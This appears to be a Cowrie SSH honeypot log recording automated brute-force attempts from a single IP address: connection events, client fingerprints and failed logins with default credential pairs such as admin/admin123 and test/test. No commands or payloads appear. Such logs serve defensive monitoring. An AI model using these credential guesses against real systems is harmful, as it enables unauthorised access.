{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35652,"dst_ip":"1.2.3.4","dst_port":22,"session":"51275236d433","protocol":"ssh","message":"New connection: 212.227.235.229:35652 (1.2.3.4:22) [session: 51275236d433]","sensor":"my-vps","timestamp":"2025-08-28T08:00:13.706703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:13.731391Z","src_ip":"212.227.235.229","session":"51275236d433"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51240,"dst_ip":"1.2.3.4","dst_port":22,"session":"36dec337815c","protocol":"ssh","message":"New connection: 212.227.235.229:51240 (1.2.3.4:22) [session: 36dec337815c]","sensor":"my-vps","timestamp":"2025-08-28T08:00:14.949880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:15.107594Z","src_ip":"212.227.235.229","session":"36dec337815c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:15.257409Z","src_ip":"212.227.235.229","session":"36dec337815c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:15.883783Z","src_ip":"212.227.235.229","session":"51275236d433"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:15.930378Z","src_ip":"212.227.235.229","session":"d96063cfc4ff"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:17.263280Z","src_ip":"212.227.235.229","session":"d96063cfc4ff"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:19.634281Z","src_ip":"212.227.235.229","session":"36dec337815c"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:21.500200Z","src_ip":"212.227.235.229","session":"36dec337815c"}
{"eventid":"cowrie.session.closed","duration":"50.8","message":"Connection lost after 50.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:27.279741Z","src_ip":"212.227.235.229","session":"13c4359398b0"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:28.272737Z","src_ip":"212.227.235.229","session":"51275236d433"}
{"eventid":"cowrie.session.closed","duration":"17.2","message":"Connection lost after 17.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:30.949479Z","src_ip":"212.227.235.229","session":"51275236d433"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47124,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd65d34d64eb","protocol":"ssh","message":"New connection: 212.227.235.229:47124 (1.2.3.4:22) [session: cd65d34d64eb]","sensor":"my-vps","timestamp":"2025-08-28T08:00:35.280159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:35.525915Z","src_ip":"212.227.235.229","session":"cd65d34d64eb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:35.574093Z","src_ip":"212.227.235.229","session":"cd65d34d64eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33188,"dst_ip":"1.2.3.4","dst_port":22,"session":"f680e52c04fe","protocol":"ssh","message":"New connection: 212.227.235.229:33188 (1.2.3.4:22) [session: f680e52c04fe]","sensor":"my-vps","timestamp":"2025-08-28T08:00:37.178433Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47138,"dst_ip":"1.2.3.4","dst_port":22,"session":"576ed79ea1e8","protocol":"ssh","message":"New connection: 212.227.235.229:47138 (1.2.3.4:22) [session: 576ed79ea1e8]","sensor":"my-vps","timestamp":"2025-08-28T08:00:37.434643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:37.436019Z","src_ip":"212.227.235.229","session":"576ed79ea1e8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:37.488091Z","src_ip":"212.227.235.229","session":"f680e52c04fe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:37.704264Z","src_ip":"212.227.235.229","session":"f680e52c04fe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:39.483799Z","src_ip":"212.227.235.229","session":"576ed79ea1e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42446,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c1c0c0f6e55","protocol":"ssh","message":"New connection: 212.227.235.229:42446 (1.2.3.4:22) [session: 8c1c0c0f6e55]","sensor":"my-vps","timestamp":"2025-08-28T08:00:40.345349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:40.358892Z","src_ip":"212.227.235.229","session":"8c1c0c0f6e55"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:40.657439Z","src_ip":"212.227.235.229","session":"8c1c0c0f6e55"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:42.968114Z","src_ip":"212.227.235.229","session":"576ed79ea1e8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:43.508656Z","src_ip":"212.227.235.229","session":"8c1c0c0f6e55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42448,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e5947b9a112","protocol":"ssh","message":"New connection: 212.227.235.229:42448 (1.2.3.4:22) [session: 2e5947b9a112]","sensor":"my-vps","timestamp":"2025-08-28T08:00:44.698558Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42452,"dst_ip":"1.2.3.4","dst_port":22,"session":"59ed948beea6","protocol":"ssh","message":"New connection: 212.227.235.229:42452 (1.2.3.4:22) [session: 59ed948beea6]","sensor":"my-vps","timestamp":"2025-08-28T08:00:44.831060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:44.945305Z","src_ip":"212.227.235.229","session":"2e5947b9a112"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:45.269799Z","src_ip":"212.227.235.229","session":"59ed948beea6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42432,"dst_ip":"1.2.3.4","dst_port":22,"session":"83fd5cb7bc64","protocol":"ssh","message":"New connection: 212.227.235.229:42432 (1.2.3.4:22) [session: 83fd5cb7bc64]","sensor":"my-vps","timestamp":"2025-08-28T08:00:46.180316Z"}
